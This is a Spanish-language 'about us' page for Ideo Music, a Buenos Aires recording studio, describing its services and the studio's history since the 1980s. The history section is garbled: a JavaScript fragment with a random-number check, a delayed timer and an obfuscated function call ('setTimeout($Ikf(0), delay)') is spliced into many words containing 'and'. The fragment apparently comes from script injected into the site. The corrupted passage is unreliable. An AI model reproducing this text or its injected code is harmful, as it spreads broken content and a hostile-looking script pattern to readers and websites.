Loading...
QUIENES SOMOS 2018-11-27T19:19:02+00:00

SOBRE NOSOTROS

Ideo Music es una empresa creativa localizada en Palemo Soho, Buenos Aires, que brinda servicios integrales de grabación, mezcla y mastering, música original, producción musical y audiovisual, enseñanza y editorial musical

Conformada por músicos, compositores, productores, técnicos y educadores musicales con una fuerte inserción en el medio, la empresa se destaca por su gran infraestructura y una privilegiada red de contactos y recursos al servicio de sus proyectos.
Ideo Music cuenta con 3 estudios de grabación, edición, mezcla y mastering , salas de ensayo, de enseñanza y múltiples áreas de expansión.

UN POCO DE HISTORIA

historia

El estudio fue construido por Miguel Loubet a principios de los años 80 y funcionó durante años como sede de su exitosa productora de música.

Aquí nacieron muchas de las principales campañas publicitarias latinoamericanas y globales de la época, además de numerosas bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andas sonoras de películas y discos.

Acompañandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando el crecimiento de la productora, el espacio fue experimentandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando ampliaciones y transformaciones.

Su sala principal, diseñada por el prestigioso Carlos Piriz y construida con los más altos standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andards de calidad durante el apogeo de Miguel Loubet Producciones, es ampliamente reconocida por su rendimiento acústico.

Al retirarse Loubet el lugar continuó funcionandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando como estudio de grabación bajo la denominación de Estudio Mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andarina hasta su cierre a principios de 2009.

En 2010 comienza una nueva etapa: Cristián de Gainza y Gabriel Stepansky se asocian para su relanzamiento. Se realizan mejoras edilicias y el estudio es re-equipado bajo la dirección técnica de Pablo López Ruiz.

Con este espacio como matriz convocante, un grupo de músicos, compositores, productores musicales y audiovisuales, técnicos y educadores de primera línea se reúnen para trabajar juntos. El propósito: constituirse como una alternativa superadora en grabación, música original, producción, formación y editorial musical, apuntada al mercado local y global.

Nace Ideo Music: Estudio de grabación + música + ideas.